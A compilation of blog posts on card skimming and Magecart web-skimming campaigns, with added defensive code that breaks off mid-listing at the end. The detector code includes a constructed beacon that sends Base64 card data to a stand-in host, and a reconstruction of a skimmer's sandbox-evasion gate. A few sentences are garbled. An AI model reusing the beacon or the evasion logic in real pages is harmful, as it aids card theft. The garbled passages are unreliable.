Showing posts with label Card Skimming.

Taking Measures to Prevent Card Skimming and Shimming

Protecting your financial information matters more than ever. With the spread of sophisticated cybercrime techniques, credit card skimming and shimming have become serious risks to customers worldwide, and being able to recognise and resist them is part of keeping your finances safe.

According to PCMag, credit card skimmers are covert devices fitted over legitimate card readers, such as ATMs or petrol pumps, that capture and store your card data. The switch to chip (EMV) cards did not end the problem: KrebsOnSecurity reports that criminals adapted with shimmers, paper-thin devices slipped inside the card slot itself, which sit between the card's chip and the reader and intercept the data exchanged with the chip.

The Royal Canadian Mounted Police (RCMP) describes how criminals install skimmers. They work quickly and discreetly, so victims rarely notice. They may fit a fake card reader over the legitimate one, or mount a small camera nearby to record PINs as they are typed.

To protect yourself, it's important to be vigilant. MakeUseOf suggests a few key steps:

  • Inspect the Card Reader: Before using an ATM or a card reader at a petrol pump, examine the card slot and keypad. Look for unusual attachments, mismatched colours or loose parts; an overlay fitted over the real reader often protrudes or wobbles when pulled.
  • Cover Your PIN: Use your hand or body to shield the keypad as you enter your PIN. This simple step can prevent criminals from capturing this crucial piece of information.
  • Monitor Your Accounts: Regularly review your bank and credit card statements for any unauthorized transactions. Report any suspicious activity to your bank immediately.
  • Choose ATMs Wisely: Whenever possible, use ATMs located in well-lit, high-traffic areas. Avoid standalone ATMs in secluded or poorly monitored locations.
  • Stay Informed: Keep up-to-date with the latest scams and techniques used by cybercriminals. Knowledge is your best defense.
Remaining vigilant and well-informed is your primary defense against credit card skimmers and shimmers. By adopting these practices and staying aware of your surroundings, you can significantly reduce the risk of falling victim to these insidious forms of cybercrime. Remember, your financial security is well worth the extra effort.


Here's How to Safeguard Your Credit Card Info

 

Sure, you recognise a phishing email (even if your parents don't). Unfortunately, thieves keep finding new ways to get hold of credit card details, leaving victims with financial losses and stress, and the old methods of fraud show no sign of fading away either.

Here's what you need to know about the different ways your credit card information might be stolen so you can safeguard your financial well-being. 

Phishing scam

Phishing remains one of the most common ways to harvest credit card details. Criminals send fake emails or messages, or set up look-alike websites, that appear to come from legitimate companies and trick you into entering your card data. Skip the checking before you reply to a suspicious message and you may end up "confirming your identity" with a criminal.

Some effective anti-phishing habits: never click on suspicious links or hand confidential information to an unknown party. Check the sender's address when judging whether an email is genuine; your bank will not contact you from a Gmail address.

Card skimming

Yes, ATM card skimming still happens in the digital era. Card skimming is when fraudsters fit devices to ATMs, petrol pumps or point-of-sale terminals to capture card data from unsuspecting victims. The devices can be hard to spot, and the captured data is later used to make cloned cards or to pay online.

To protect yourself against card skimming, check card readers for signs of tampering, shield the keypad with your hand when entering your PIN, use ATMs in secure, well-lit places, and pay by mobile wallet or tap-to-pay wherever possible.

Data breaches

A data breach happens when attackers gain access to a company's systems and steal sensitive customer data such as card details. These breaches are common and hit even large, well-known companies. Criminals then sell the data on the dark web or use it for fraudulent transactions.

Regularly check for breach notifications from firms you hold accounts with, and use two-factor authentication wherever possible. If you learn your details were exposed in a breach, change your password on every site where you used the same login, and stop reusing passwords.

Physical thievery 

With all of the modern tools of theft to be aware of, we must not overlook good old-fashioned pickpocketing. Even losing your wallet or purse can expose your credit card information, especially if the criminal watched you enter your PIN at the ATM before robbing you. If your card is lost or stolen, don't put it off: notify your bank right away to limit the damage. 

The bottom line when it comes to avoiding credit card fraud is to be attentive, practise good security habits, and constantly examine your financial statements to discover any strange activity as soon as possible. The best line of defence against credit card theft is to be vigilant and knowledgeable.

Online Thieves Target Legitimate Ecommerce Sites to Steal Credit Cards

 

In a recent Magecart credit card theft campaign, legitimate websites are hijacked and used as makeshift command and control (C2) servers from which skimmers are injected into, and hidden on, selected eCommerce sites.

A "Magecart attack" is the compromise of an online store to insert malicious scripts that steal customers' card and personal details as they check out.

According to the Akamai researchers tracking this campaign, organisations in the United States, the United Kingdom, Australia, Brazil, Peru and Estonia have been compromised.

A further sign of how stealthy these attacks are, the firm notes, is that many victims went unaware of the compromise for more than a month.

Exploiting legitimate sites 

The initial step taken by the attackers is to find trustworthy websites that are vulnerable and hack them to host their malicious code and function as C2 servers for their attacks. 

Distributing the skimmer from reputable, legitimate domains lets the threat actors evade detection and domain blocklisting, and spares them from building their own infrastructure.

The next step taken by the attackers is to insert a short JavaScript snippet into the target e-commerce websites that retrieves the malicious code from the previously compromised websites.

"Although it is unclear how these sites are being breached, based on our recent research from similar, previous campaigns, the attackers will usually look for vulnerabilities in the targeted websites' digital commerce platform (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third-party services used by the website," researchers explained in the report. 

To make the attack harder to notice, the threat actors structured the skimmer to mimic Google Tag Manager or Facebook Pixel, well-known third-party services that are unlikely to draw attention. The host URL is also hidden behind Base64 encoding.

Data theft details 

Akamai claims to have observed two different skimmer iterations being used in the specific campaign. 

The first version is heavily obfuscated and includes a set of CSS selectors targeting customer PII and card fields; a different selector set was built for each targeted site.

The second variant lacked that protection, so indicators in its code were exposed, which allowed Akamai to map the campaign's distribution and identify further victims.

Once the skimmer has harvested the customer's data, it sends it to the attacker's server in an HTTP request disguised as an IMG tag: the data rides in the URL of an image load, a plain GET that any page can make cross-origin without a CORS preflight. The data carries a layer of Base64 encoding to obscure the transmission and reduce the chance that the victim notices the breach.
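The beacon described above leaves a trace a defender can look for after the fact. The following is an added example, not code from the Akamai report: given a list of outbound request URLs captured from a checkout page (from a proxy log or a browser PerformanceObserver dump), it flags "image" requests to third-party hosts whose query value or last path segment decodes from Base64 to something containing Luhn-valid card numbers or several PII-looking keys. All hostnames and sample URLs are constructed; the first-party allowlist is an assumption you would replace with your own domains.

```javascript
// Added example (not from the Akamai report): spot IMG-beacon exfiltration in captured request URLs.
// FIRST_PARTY_HOSTS is an assumed allowlist; sample hosts below are constructed.
const FIRST_PARTY_HOSTS = new Set(['shop.example', 'cdn.shop.example']);

// Luhn check, so that a 16-digit order number is not mistaken for a card number.
function luhnValid(digits) {
  if (digits.length < 13 || digits.length > 19) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Decode a base64 or base64url token to printable text; null if it is not one.
function tryBase64(token) {
  const norm = token.replace(/-/g, '+').replace(/_/g, '/');
  if (norm.length < 16 || !/^[A-Za-z0-9+/]+=*$/.test(norm)) return null;
  const text = Buffer.from(norm, 'base64').toString('utf8');
  return /^[\x09\x0a\x0d\x20-\x7e]+$/.test(text) ? text : null;
}

function findCardNumbers(text) {
  return [...text.matchAll(/\b\d{13,19}\b/g)].map(m => m[0]).filter(luhnValid);
}

// Classify one request URL; returns a finding or null.
function inspectRequest(url) {
  const u = new URL(url);
  if (FIRST_PARTY_HOSTS.has(u.hostname)) return null;
  // Skimmers smuggle the blob in a query value or as the last path segment.
  const candidates = [...u.searchParams.values(), u.pathname.split('/').pop()];
  for (const c of candidates) {
    const decoded = tryBase64(c);
    if (decoded === null) continue;
    const pans = findCardNumbers(decoded);
    const piiKeys = (decoded.match(/"(cc|card|cvv|exp|email|phone|zip|name)[^"]*"\s*:/gi) || []).length;
    if (pans.length > 0 || piiKeys >= 2) {
      return {
        host: u.hostname,
        // Mask before logging: the finding itself must not become a second leak.
        pans: pans.map(p => p.slice(0, 6) + '*'.repeat(p.length - 10) + p.slice(-4)),
        piiKeys,
      };
    }
  }
  return null;
}

function scanRequests(urls) {
  return urls.map(inspectRequest).filter(f => f !== null);
}

// Constructed sample traffic. The third entry is built the way such a skimmer builds its beacon:
// serialise the harvested fields, Base64 them, hang them off an <img src>.
const harvested = JSON.stringify({ name: 'A Customer', cc: '4111111111111111', exp: '12/27', cvv: '123', email: 'a@example.org' });
const SAMPLE_REQUESTS = [
  'https://cdn.shop.example/static/frontend.js',
  'https://shop.example/checkout/onepage/',
  'https://img.third-party.example/pixel.gif?d=' + encodeURIComponent(Buffer.from(harvested).toString('base64')),
  'https://img.third-party.example/pixel.gif?d=dHJhY2s=',  // short, harmless-looking beacon
];

console.log(scanRequests(SAMPLE_REQUESTS));
```

The check is deliberately conservative: a token must decode to printable text and either contain a Luhn-valid number or at least two field names before it is reported, which keeps ordinary analytics beacons and cache-busting hashes out of the findings.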

Website owners can reduce their exposure to Magecart by securing admin accounts properly and keeping their CMS and plugins updated. Shoppers can limit what a compromised store can expose by paying through a wallet service, using virtual cards, or capping how much can be charged to their cards.

Amazon Bans Flipper Zero for Being a Card Skimming Tool

 

The Flipper Zero portable multi-tool for pen testers is no longer available for purchase on Amazon as the company has designated it as a card-skimming device, prohibiting its sale on the platform. 

According to Pavel Zhovner, CEO of Flipper Devices, the company asked Amazon to reconsider the prohibition because the gadget cannot skim bank cards. 

The Flipper Zero is a small, mobile, programmable pen-testing device that may assist in experimenting with and debugging a variety of digital and physical devices via many protocols, including RFID, radio, NFC, infrared, Bluetooth, and others.

Since its release, users have demonstrated the Flipper Zero's capabilities by showing how it can ring doorbells, perform replay attacks to unlock cars and open garage doors, and clone a variety of digital keys.

Flipper Zero has now been blocked by Amazon, which has labelled it as a "restricted product," according to notices distributed to vendors on Thursday evening.

On Amazon Seller Central, card-skimming tools are listed alongside key-copying tools and shoplifting tools such as Sensormatic detachers, under the restricted product category for lock-picking and theft devices.

There are currently some dead links to previously accessible Amazon pages that sold Flipper Zero tools, with the message "sorry, we couldn't find that page." 

At this time, Flipper Zero offerings on Amazon are limited to accessories like silicone cases, screen protectors, and WiFi Devboards.

"This product has been identified as a card skimming device. Amazon policy prohibits the sale or listing of card skimming devices," reads a notification sent to one Amazon seller confirming that a Flipper Zero listing was removed from Amazon's catalogue.

"We took this action because this product is not permitted for sale on Amazon.com. It is your obligation to make sure the products you offer comply with all applicable laws, regulations, and Amazon's policies."

The firm also issued a warning to Flipper Zero merchants, advising them to review all of their other items and delete any other prohibited products within 48 hours, failing which their accounts would be deactivated. 

"Within 48 hours of this warning please review your listings and close, delete, or archive any listings that do not comply with all applicable laws, regulations, and Amazon's policies. Failure to properly close or delete all restricted product listings from your inventory may result in the deactivation of your selling account, and funds may be permanently held." 

The Amazon ban won't trouble every prospective Flipper Zero buyer, though, because sellers there were charging a premium. The device can still be bought from the manufacturer's official store, which is restocked frequently.

Citing its alleged use by criminals, Brazil's National Telecommunications Agency (Anatel) has also been seizing incoming Flipper Zero shipments. Brazilians who bought the devices say every certification request has been refused by the agency.

Microsoft: Credit Card Stealers are Switching Tactics to Conceal the Attack

 

Attackers are tampering with e-commerce checkout pages and harvesting payment card data using image files that conceal a malicious PHP script. According to Microsoft, card-skimming malware is increasingly using server-side PHP to modify payment pages, sidestepping the browser-side defences that JavaScript injection can trigger.

Card-skimming malware has changed approach, Microsoft threat analysts say. For the past decade card skimming has been dominated by so-called Magecart malware, which injects JavaScript into checkout pages to capture and exfiltrate payment card data. Injecting JavaScript into the front end is comparatively conspicuous, Microsoft notes, because it can trip browser defences such as Content Security Policy (CSP), which can block scripts from unapproved origins.

By targeting the web server with malicious PHP instead, attackers found a quieter route. In November 2021 Microsoft found two malicious image files on a server running Magento, a popular e-commerce platform; one posed as a browser favicon. The images carried an embedded PHP script, which a web server will not execute by default. To hit shoppers only, the script first checks via cookies that no site administrator is currently signed in before it runs.

The PHP script reads the current page URL and looks for the keywords "checkout" and "one page", which correspond to Magento's checkout page. "The insertion of the PHP script in an image file is interesting because, by default, the webserver wouldn't run the said code. Based on previous similar attacks, we believe that the attacker used a PHP 'include' expression to include the image (that contains the PHP code) in the website's index page, so that it automatically loads at every webpage visit," Microsoft explained.

Malicious PHP is increasingly common in card-skimming malware. Last week the FBI warned of new cases in which card-skimming attackers planted PHP web shells on US business checkout sites for backdoor remote access to the web server. Sucuri found that PHP skimmers aimed at back-end web servers accounted for 41% of new credit card-skimming malware found in 2021. And according to Malwarebytes, Magecart Group 12 is distributing new web shell malware that dynamically loads JavaScript skimming code via server-side requests on merchant sites.

Malwarebytes' Jérôme Segura noted, "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer. Unlike previous incidents where a fake favicon image was used to hide malicious JavaScript code, this turned out to be a PHP web shell."    

Malicious JavaScript is still used to skim cards, however. Microsoft also found JavaScript-based skimmers spoofing Google Analytics and Meta Pixel (formerly Facebook Pixel) scripts, for example.

WooCommerce Credit Card Stealer Found Implanted in Fake Images

 

Card skimming remains one of the attacker's more reliable ways of stealing card data. Earlier this week, researchers at Sucuri described a campaign in which a credit card swiper was injected via WordPress' wp-settings.php file. The WooCommerce site's customers had reported that images were disappearing from the cart almost as soon as they were uploaded.

According to the researchers, the skimmer itself was buried in a file at '../../Maildir/sub.main', easy to miss on a casual review. Attackers prefer to keep malicious content out of the way: a common tactic is to create directories that look like system directories, or to drop malware into existing cPanel or other server directories.

Analysing the file, the researchers found over 150 lines of code obfuscated with str_rot13 and base64. Several functions wrote the captured card data into the image file wp-content/uploads/highend/dyncamic.jpg. Decoded, that file contained not only the card details submitted to the site but also admin credentials for the site's back end.

Injecting skimmers into WordPress plugin files is the newest trend: it avoids the closely watched wp-admin and wp-includes core folders, where injections are usually short-lived. It is one of the most lucrative and stealthy tactics these groups use.

Parking the stolen data in an image file is useful to the attacker for two reasons. First, it makes the loot trivial to retrieve in a browser or from a console. Second, most website and server malware scans focus on file extensions such as PHP, JS and HTML; image files, particularly in wp-content/uploads sub-directories, are easily overlooked.

“Scammers are aware that most security plugins for WordPress contain some way to monitor the file integrity of core files (that is, the files in wp-admin and wp-includes directories). This makes any malware injected into these files very easy to spot even by less experienced website administrators. The next logical step for them would be to target plugin and theme files,” researchers explained.

Payment Card Skimming Resurfaces with an Internet Twist

 

Card skimming predates the mainstream internet and is enjoying a revival as fraudsters see fresh opportunity to combine physical-world data theft with online intrusion. Only a week ago it was reported that over 500 online retail sites were hit in one large "card skimming" incident, in which threat actors planted code that let them copy and steal data from genuine debit and credit cards as they were used for purchases.

Card-skimming fraudsters once had to fit a physical device to an ATM or payment terminal to read genuine customers' cards. With online shopping more popular than ever, cyber thieves now plant malware on the checkout pages of e-commerce sites to capture card details, which they resell or use in their own schemes.

Sansec, a malware and vulnerability detection firm working with over 7,000 online retailers, was among the first to notice this activity earlier this month. The vendor recommends cleaning the affected sites to remove the malicious code, but experts fear the skimmers may simply change tactics and use backdoors to re-insert their malware.

Many of these new card-skimming attacks, along with other card-not-present theft techniques, have been linked to the Magecart criminal ecosystem. The situation may worsen if mobile phones increasingly double as card readers.

Ars Technica reports that the firm was able to speak with administrators of the hijacked sites. The attackers used a SQL injection flaw and a PHP object injection attack, both in Quickview, a Magento 2 extension that lets shoppers view product details without loading the full listing.

By abusing the plugin, the attackers added a validation rule to the customer_eav_attribute table and injected a payload onto the site. The payload runs when Magento unserialises that data; the attackers trigger this simply by signing up as a new guest on the site.

Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Element Vape, a large online retailer of e-cigarettes and vaping kits, has been hosting a credit card skimmer on its website since a breach. The retailer sells e-cigarettes, vaping hardware, e-liquids and synthetic products through retail and online stores in the United States and Canada.

The Element Vape site was loading a malicious JavaScript file from a third-party domain that behaves as a credit card stealer. Magecart is the collective name for threat actors who inject card-skimming scripts into eCommerce sites.

On many of the shop's pages, starting with the homepage, a mysterious base64-encoded script can be seen around lines 45-50 of the HTML source. How long the injected code had been on ElementVape.com was not known at first.

A Wayback Machine check of ElementVape.com shows the code was absent on 5 February 2022 and earlier, so the infection appears to be recent, some time between that date and the day of detection. Decoded, the snippet simply fetches a JavaScript file from a third-party site:

/weicowire[.]com/js/jquery/frontend.js

Decoded and examined, the script was plainly built to collect card and billing details from customers during checkout. It looks for email addresses, payment card data, phone numbers and billing addresses (including street and ZIP code).

The harvested data goes to a Telegram address that is hard-coded, in obfuscated form, in the script. The code also contains anti-analysis checks that look for a sandbox or open developer tools to frustrate examination.

How the back end of ElementVape.com was altered to let the script in is not known. Reportedly this is not Element Vape's first breach: in 2018 users received letters from the company stating it had suffered a data breach, with a "window of penetration between December 6, 2017, and June 27, 2018" that might have exposed users' personal details to threat actors.

Target Reveals Its Personal Skimming Detection Tool


Web skimming has been a major problem for e-commerce sites for several years. The attacks range from simple script injections into payment pages to breaches of genuine third-party services and scripts. Often referred to as Magecart attacks, they have become one of the leading causes of card-not-present (CNP) fraud, affect small and large brands alike, and hit e-commerce platforms themselves. Target, one of the top e-commerce retailers, built its own solution a few years back to tackle the problem and keep customers safe when shopping on the Target website.
 
Since few ready-made tools for detecting these attacks existed at the time, two of the company's security engineers built one. After more than three years in production use, Target.com's client-side scanner has now been released as an open-source project named Merry Maker. Merry Maker continuously simulates browsing and performs test transactions to look for malicious code.

Merry Maker behaves as a guest on Target.com, carrying out ordinary tasks including purchases. While doing so it records and analyses network requests, browser activity and JavaScript files, looking for anything suspicious.

About Card Skimming 

Card skimming is an attack in which a hostile device is placed at the point of a legitimate transaction to steal financial credentials. In the physical world, skimming devices are fitted to the card slots of ATMs or fuel pumps to read the data encoded on the card's magnetic stripe, often paired with a fake PIN pad or a small camera to capture the PIN the user types.

Chip-based cards, which use cryptography and additional transaction authentication and verification features, were intended to defeat such attacks. "Web skimming groups use sophisticated techniques to make their keylogging code hard to detect. The code can be heavily obfuscated and added to existing JavaScript files or even stored in other types of resources such as CSS or even embedded into images or it can be hosted on third-party domains," writes CSO.

To Stay Under the Radar, Magecart Credit Card Skimmer Avoids VMs

 

A new Magecart threat actor is using a digital skimmer to steal payment card data from victims' browsers, with an unusual evasion: it detects virtual machines (VMs) so that it targets only real victims and not security researchers. Researchers at Malwarebytes found the campaign, which adds an extra in-browser check that probes the machine for a VM via the WebGL JavaScript API, according to a blog post published Wednesday.

It does this by asking whether the graphics renderer is a software fallback rather than the hardware (GPU) renderer. The script searches the renderer string for swiftshader, llvmpipe and VirtualBox. SwiftShader is Google Chrome's fallback renderer; llvmpipe is Firefox's.

 “By performing this in-browser check, the threat actor can exclude researchers and sandboxes and only allow real victims to be targeted by the skimmer,” Malwarebytes Head of Threat Intelligence Jérôme Segura wrote in the post. 

Magecart is an umbrella term for threat groups that infect e-commerce sites with card-skimming scripts on checkout pages to steal money and personal data from customers. Because security researchers know their activity so well, they constantly seek new ways to avoid detection.

Detecting the VMs used by researchers and by sandboxing products built to catch Magecart activity is a common evasion, Segura says, but "It is more rare to see the detection of virtual machines via the browser for web-based attacks." Threat actors more typically filter targets by geolocation and user-agent string, he added.

If the machine passes the check, data exfiltration proceeds as normal: the skimmer scrapes the customer's name, address, email, phone number and card details. "It also collects any password (many online stores allow customers to register an account), the browser's user-agent, and a unique user ID. The data is then encoded and exfiltrated to the same host via a single POST request," said Segura.
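The renderer check is small enough to show in full. The following is an added example, not the skimmer code Malwarebytes published: the gate as the post describes it, written against a WebGL context object so the same logic can be exercised here with constructed fake contexts, together with the counter-measure an analyst applies in a sandbox, which is to make the unmasked renderer report a hardware GPU. The WEBGL_debug_renderer_info extension and its UNMASKED_RENDERER_WEBGL constant are the real browser API; the renderer and user-agent strings are constructed samples, and the headless user-agent filter is an assumption about what such a gate would typically add.

```javascript
// Added example (not the published skimmer): the WebGL software-renderer gate and its counter-measure.
const SOFTWARE_RENDERERS = /swiftshader|llvmpipe|virtualbox/i;  // the three names the skimmer looks for

// WEBGL_debug_renderer_info is a real extension; UNMASKED_RENDERER_WEBGL is the constant 0x9246.
function unmaskedRenderer(gl) {
  if (!gl) return null;
  const ext = gl.getExtension('WEBGL_debug_renderer_info');
  return ext ? String(gl.getParameter(ext.UNMASKED_RENDERER_WEBGL)) : null;
}

// The skimmer's gate: true means "real victim, run", false means "VM or sandbox, stay quiet".
// The user-agent filter is the more common check the post mentions alongside it (assumed pattern).
function looksLikeRealUser(gl, nav) {
  const renderer = unmaskedRenderer(gl);
  if (renderer === null) return false;            // no WebGL or no debug extension: nothing to judge, stay quiet
  if (SOFTWARE_RENDERERS.test(renderer)) return false;
  if (/HeadlessChrome|PhantomJS/i.test(nav.userAgent)) return false;
  return true;
}

// Analyst side: wrap the context so the unmasked renderer reports a hardware GPU. In a browser you
// would patch WebGLRenderingContext.prototype.getParameter the same way before the page's scripts run.
function withSpoofedRenderer(gl, hardwareName) {
  const ext = gl.getExtension('WEBGL_debug_renderer_info');
  const target = ext ? ext.UNMASKED_RENDERER_WEBGL : undefined;
  return new Proxy(gl, {
    get(t, prop) {
      if (prop === 'getParameter') return p => (p === target ? hardwareName : t.getParameter(p));
      const v = t[prop];
      return typeof v === 'function' ? v.bind(t) : v;
    },
  });
}

// Constructed stand-in for a canvas.getContext('webgl') result.
function fakeGl(renderer) {
  return {
    getExtension: name => (name === 'WEBGL_debug_renderer_info' ? { UNMASKED_RENDERER_WEBGL: 0x9246 } : null),
    getParameter: p => (p === 0x9246 ? renderer : null),
  };
}

// Constructed sample strings: one hardware renderer, one Firefox software fallback.
const NAV = { userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0' };
const GPU = 'ANGLE (NVIDIA, NVIDIA GeForce GTX 1060 Direct3D11 vs_5_0 ps_5_0)';
const SANDBOX = 'llvmpipe (LLVM 10.0.0, 256 bits)';

console.log(looksLikeRealUser(fakeGl(GPU), NAV),
            looksLikeRealUser(fakeGl(SANDBOX), NAV),
            looksLikeRealUser(withSpoofedRenderer(fakeGl(SANDBOX), GPU), NAV));
```

In a real page the first argument is document.createElement('canvas').getContext('webgl'). The practical lesson for detonation sandboxes is that a VM whose browser falls back to llvmpipe or SwiftShader will never see this skimmer fire; either give the VM GPU passthrough or spoof the renderer string as above.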

To help defenders spot the campaign, Malwarebytes has published the skimmer code and a full list of indicators of compromise in its post.

Stolen Card Validation Service Illuminated A New Corner of the Skimming Ecosystem

 

Recent analyses of threat infrastructure show that the digital credit card skimming ecosystem keeps evolving: researchers keep identifying new players, tooling, services and economies within it, and significant patterns emerge in the infrastructure these groups use and share.

Many domains used for digital skimming and other criminal activity have been hosted in Alibaba IP space in recent years. Because bulletproof hosting providers host a large share of skimming campaigns, this may be one such provider abusing Alibaba's hosting services. Some of these domains have more recently been seen abusing Google's user-content hosting service as well.

While investigating the MobileInter skimmer's infrastructure, analysts found that one of its skimmer domains was briefly hosted on a Google IP address. That IP then hosted a domain offering card skimmers a useful paid service: validating stolen payment data. Using RiskIQ's Internet Intelligence Graph, the analysts found multiple related websites, services and social media accounts tied to this validation service, known as bit2check. Some bit2check hostnames have been seen abusing Alibaba and Google hosting in the same way as Magecart domains.

Further investigation indicated that the person behind bit2check is a Kurdish actor going by the name Hama. No clear relationship was found between Hama and the bulletproof hosting operation seen on Alibaba, but the connection could yet lead to more information about who provides that hosting.

The bit2check website advertises a bit2check Telegram group and bills itself as the "greatest CVV/cc checker in town." Many Kurdish-language Telegram channels also link to the bit2check site and others, including bin-checker[.]net, a free version of bit2check. These carding services promote each other through links on their websites and Telegram channels.

The domains and accounts linked to Hama also overlap with other players in the carding sector: code written by another actor known as namso appears on some of Hama's sites, and a directory called namso_files sits in Hama's GitHub repository.

Since RiskIQ first reported on Magecart in 2016 and its historic attack against British Airways in 2018, they have been investigating browser-based card skimming. 

Bit2check is another part of this vast ecosystem that caters to skimmers looking to validate their loot or buy more stolen information. Many of the companies in this ecosystem network, both the skimmers and the services that cater to them, are using the same strategies and infrastructure, according to RiskIQ.

Outdated Magento 1 Sites Targeted by Credit Card Skimmers

 

Magento is an open-source e-commerce platform that gives online merchants a scalable shopping cart system and control over their store's layout, content and features. Since the autumn of 2020, threat actors have been exploiting a flaw in the 'Magento 1' branch, which no longer receives security updates.

The thousands of retailers worldwide still on Magento 1 are urged to upgrade to 'Magento 2', as thousands of shops have been hacked and infected with card-skimming code. While tracking Magento 1 incidents, researchers observed one e-commerce shop attacked by two separate skimmers.

In this incident, the second group's code recognises sites already injected by the first Magento 1 skimmer; the second skimmer then simply harvests card data from the fake payment form the first group had already injected.

"A large number of Magento 1 sites have been hacked but yet are not necessarily being monetized,” as stated by the researcher at Malwarebytes. He further added that “Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another.” 

The end-of-life of Magento 1, paired with a famous feat, was an immense blessing for the actors at risk. Many pages were indiscriminately compromised merely because they were weak. RiskIQ has allocated these cases to Magecart Group 12, which uses diverse tactics including chain threats with a long history of web skimming.

On the payment websites of Costway, one of the leading retailers in North America and Europe, two web skimmers have been found selling appliances, furniture, etc. The skimmers seek to provide payment information with consumers' credit card. “Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame,” said researchers. 

On the Costway checkout page, the researchers noticed the injected credit card skimmer, which stands out because it is written in English while most of the site is in French. This is no surprise given how automated and indiscriminate the Magento 1 hacking campaign has been.

The threat to victims is significant: researchers note that in December 2020 alone, Costway's French portal (Costway[.]fr) received approximately 180K visitors. There is also a second skimmer on the site, loaded externally from securityxx[.]top, which targets the Magento 1 skimmer.

Many Magento 1 websites have been compromised but are not yet being monetized, so other attackers will certainly continue to inject their own malicious code.
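A defender-side check for the pattern described above, where an additional skimmer is pulled onto the checkout page from an external host the store never approved. This is an added example, not code from Malwarebytes or the Magento project; the host names, the sample HTML and the allowlist are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSrcCollector(HTMLParser):
    """Record the src attribute of every external <script> tag seen."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def audit_scripts(html, allowed_hosts):
    """Return script sources loaded from hosts outside allowed_hosts.

    Relative paths (no host) are the shop's own assets and are skipped;
    protocol-relative "//host/x.js" URLs are resolved to their host.
    """
    collector = ScriptSrcCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    suspicious = []
    for src in collector.sources:
        host = urlparse(src.strip()).hostname  # None for relative paths
        if host is not None and host not in allowed:
            suspicious.append(src)
    return suspicious


# Constructed checkout page: the store's own assets plus one script pulled
# from a host the store never approved (stand-in for an external loader).
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/js/mage/checkout.js"></script>
<script src="https://static.example-shop.test/js/payment.js"></script>
<script>var checkoutConfig = {};</script>
<script src="//cdn.unapproved.example/js/ga.js"></script>
</head><body></body></html>
"""
ALLOWED_HOSTS = {"static.example-shop.test", "www.example-shop.test"}

if __name__ == "__main__":
    for src in audit_scripts(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS):
        print("script from unapproved host:", src)
```

Run it against a saved copy of the checkout page on a schedule and alert on any non-empty result; a newly appearing third-party origin on a payment page is exactly what the second Costway skimmer looked like.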

More than 17,000 Domains Affected with Code which Steals Card Data

Cybercriminals running Magecart operations have added payment card skimming code to more than 17,000 domains with JavaScript files in misconfigured Amazon S3 buckets.

Cybercriminals exploited the lack of access control in Amazon's cloud storage service and affected over 17,000 domains through automated attacks that modified JavaScript code indiscriminately, without checking whether the code would ever load on a payment page.

The campaign, part of Magecart operations, began in April; attackers injected payment card skimming code into a large number of domains through JavaScript files hosted in poorly configured Amazon S3 buckets that granted write permissions to anyone who found them.

According to the security researchers at RiskIQ, the discovery of these S3 buckets had been automated by the authors of the campaign.

Referencing the findings of Yonathan Klijnsma, RiskIQ's head of threat research: "Once the attackers find a misconfigured bucket, they scan it for any JavaScript file (ending in .js). They then download these JavaScript files, append their skimming code to the bottom, and overwrite the script on the bucket."

"Even if your bucket has information that anyone can access, it does not mean everyone should be able to modify the content," he added.

The fact that a large number of websites using Amazon's cloud storage service failed to restrict access to the corresponding assets played a major role in the Magecart campaign achieving its malicious objectives.
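An added example, not RiskIQ's tooling, that audits the two places an S3 bucket can hand out write access: a bucket policy document and a bucket ACL, in the JSON shapes the S3 API returns (the `Policy` string from boto3's `get_bucket_policy` and the dict from `get_bucket_acl`). It separates the intended public read from the public write that let the campaign overwrite scripts; the policy and ACL below are constructed samples.

```python
import json
from fnmatch import fnmatch

# S3's predefined groups for "anyone" and "any signed-in AWS account".
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
WRITE_PERMISSIONS = {"WRITE", "FULL_CONTROL"}  # ACL permissions that allow writes


def _is_public(principal):
    """True for a policy Principal of "*" or {"AWS": "*"} (any caller)."""
    if isinstance(principal, dict):
        principal = principal.get("AWS", [])
    return "*" in ([principal] if isinstance(principal, str) else principal)


def public_write_in_policy(policy_json):
    """Sids of Allow statements that let any caller put (overwrite) objects.
    Conditions are ignored deliberately; such statements still need review."""
    findings = []
    for i, stmt in enumerate(json.loads(policy_json).get("Statement", [])):
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        # fnmatch so wildcards such as "s3:*" or "s3:Put*" are caught too.
        if (stmt.get("Effect") == "Allow" and _is_public(stmt.get("Principal"))
                and any(fnmatch("s3:putobject", a.lower()) for a in actions)):
            findings.append(stmt.get("Sid", f"statement[{i}]"))
    return findings


def public_write_in_acl(acl):
    """Permissions an ACL grants to the public groups that allow writes."""
    return [g["Permission"] for g in acl.get("Grants", [])
            if g.get("Grantee", {}).get("Type") == "Group"
            and g["Grantee"].get("URI") in PUBLIC_GROUP_URIS
            and g.get("Permission") in WRITE_PERMISSIONS]


# Constructed samples: public read is intended, public write is the flaw.
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-assets/*"},
    {"Sid": "PublicWrite", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::example-assets/*"}]})
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
SAMPLE_ACL = {"Grants": [
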